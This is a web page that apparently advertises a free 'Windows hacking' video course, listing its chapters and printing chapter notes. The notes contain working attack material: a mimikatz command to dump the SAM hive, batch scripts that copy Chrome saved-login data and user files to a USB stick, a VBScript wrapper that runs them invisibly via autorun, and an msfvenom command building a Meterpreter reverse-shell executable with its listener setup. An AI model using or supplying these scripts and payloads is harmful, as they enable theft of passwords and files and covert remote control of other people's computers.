Complete Windows Hacking Course with Kali Linux and Python

How to Learn Windows Hacking with Kali Linux Free

Download and stream premium ethical hacking video course free. Learn Windows hacking, Kali Linux, and Python skills in one powerful course.

Chapter-wise Video Courses With Playlists

We Offer Video Courses Organized Chapter By Chapter For Easy Learning. Each Chapter Includes A Dedicated Playlist, So You Can Access All Related Videos In One Place. You Can Browse Through The List, Choose The Chapter You’re Interested In, And Select Any Video From The Playlist. Our Responsive Video Player Appears on The Same Page, Letting You Watch Your Selected Video Without Navigating Away. You Can Switch Between Chapters or Videos Anytime With Just One Click. We Designed This Layout To Save Your Time And Give You Full Control Over What You Want To Learn And When. Whether You’re Revisiting A Topic or Starting Fresh, Our Organized Structure Helps You Find Exactly What You Need Quickly. Enjoy Smooth Playback, Instant Video Switching, And A Clean Viewing Experience, All In One Convenient Page.

01. Introduction: 1. Introduction


Chapter 01

  • 1. Introduction1. Introduction

Chapter 02

  • 1. Setting up Kali Virtual Machine1. Setting up Kali Virtual Machine
  • 2. Basic Settings (grant root access,updating kali,conneting wireless adapter toVM)2. Basic Settings (grant root access,updating kali,conneting wireless adapter toVM)
  • 3. Networking VM with the Host3. Networking VM with the Host
  • 4. Setting up Windows VM and Networking4. Setting up Windows VM and Networking

Chapter 03

  • 1. Bypassing Windows Password With CMD1. Bypassing Windows Password With CMD
  • 2. SAM File and  Password Cracking with Mimikatz2. SAM File and Password Cracking with Mimikatz
  • 3. Getting Sensitive Data with USB Part-13. Getting Sensitive Data with USB Part-1
  • 4. Getting Sensitive Data with USB Part-24. Getting Sensitive Data with USB Part-2

Chapter 04

  • 1. View Psswords Using CMD1. View Psswords Using CMD
  • 2. Creating Automated Batch Srcipt for Getting Wifi Passwords2. Creating Automated Batch Srcipt for Getting Wifi Passwords
  • 3. Converting Batch Script into Invisible EXE File3. Converting Batch Script into Invisible EXE File
  • 4. Launching Social Engineering Attack With USB4. Launching Social Engineering Attack With USB

Chapter 05

  • 1. Basic Target Discovery with Netdiscover1. Basic Target Discovery with Netdiscover
  • 2. Exploring Targets with Nmap2. Exploring Targets with Nmap
  • 3. Target OS detection with Nmap3. Target OS detection with Nmap
  • 4. Visualizing Network Topology with Zenmap4. Visualizing Network Topology with Zenmap

Chapter 06

  • 1. Metasploit Architecture and Basic syntax1. Metasploit Architecture and Basic syntax
  • 2. Creating Basic Payload with Msfvenom2. Creating Basic Payload with Msfvenom

Chapter 07

  • 1. Basics of Meterpreter Part - 11. Basics of Meterpreter Part – 1
  • 2. Basics of Meterpreter Part - 22. Basics of Meterpreter Part – 2

Chapter 08

  • 01. Installing Python and Setting up IDE01. Installing Python and Setting up IDE
  • 02. Print Function and F Strings02. Print Function and F Strings
  • 03. Variables and Basic Data Types in Python03. Variables and Basic Data Types in Python
  • 04. Operators in Python04. Operators in Python
  • 05. Python Functions05. Python Functions
  • 06. Global and Local Variables in Python06. Global and Local Variables in Python
  • 07. Working with Lists07. Working with Lists
  • 08. Working with Dictionaries08. Working with Dictionaries
  • 09. If Else Statements in Python09. If Else Statements in Python
  • 10. While Loops, Break and Continue Statements10. While Loops, Break and Continue Statements
  • 11. For Loops11. For Loops
  • 12. Classes and Objects in Python12. Classes and Objects in Python

Chapter 09

  • 1. Introduction to Sockets Part 011. Introduction to Sockets Part 01
  • 2. Introduction to Sockets Part 022. Introduction to Sockets Part 02

Chapter 10

  • 1. Creating a Simple Chat Application Between Client and Server1. Creating a Simple Chat Application Between Client and Server

Chapter 11

  • 1. The Reverse Shell  Strategy1. The Reverse Shell Strategy
  • 2. Creating the Reverse Shell Part 012. Creating the Reverse Shell Part 01
  • 3. Creating the Reverse Shell Part 023. Creating the Reverse Shell Part 02
  • 4. Testing the Reverse Shell Locally4. Testing the Reverse Shell Locally

Chapter 12

  • 1. Installing Pyinstaller with PIP1. Installing Pyinstaller with PIP
  • 2. Converting client.py into a EXE File2. Converting client.py into a EXE File

Chapter Notes:

Chapter 2 – 3.1 syntax for mounting shared folder

mount.cifs //Win10/kali /root/Desktop/shared -o user=root

Chapter 3 – 2.1 mimikatz syntax

lsadump::sam /system:C:\SYSTEM /sam:C:\SAM

Chapter 3 – 3.1 syntax for password getting usb

@echo off
copy "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Login Data"

Chapter 3 – 4.1 syntax for getting other files

for stealer script-

@echo off
copy "%userprofile%\pictures" "copied"

for hiding script-

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

for final autorun file-

wscript.exe \hide.vbs test.bat

Chapter 6 – 2.1 msfvenom syntax

for creating payload-

msfvenom -p windows/meterpreter/reverse_tcp lport=8080 lhost=192.168.129.128 -f exe > test.exe

for start the listner-
 
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.129.128
set lport 8080
exploit

Chapter 11 – 2.1 server

import socket
server = socket.socket()
server.bind(("",5000))
server.listen()
connection,adress = server.accept()
print(f"new connection from : {adress}")

while True:
    recieved = connection.recv(1024).decode()
    print(f"client : {recieved}")
    message = input(">>")
    connection.send(message.encode())

Chapter 11 – 3.1 client

import socket
client = socket.socket()
host = socket.gethostname()
port = 5000
client.connect((host,port))

message = input(">>")
while True:
    client.send(message.encode())
    recieved = client.recv(1024).decode()
    print(f"server : {recieved}")
    message = input(">>")

Download Complete Course Pack

Please Download The Complete Course Pack, Which Includes Subtitle Files And Any Available Bonus Content. Some Course Packs Also Contain Assets And Bonus Materials, But Not All of Them. Before You Download, Make Sure To Open And Read The Notepad File Attached On The Download Page. It Provides Important Details About What Each Course Pack Includes.

Leave a Reply

Your email address will not be published. Required fields are marked *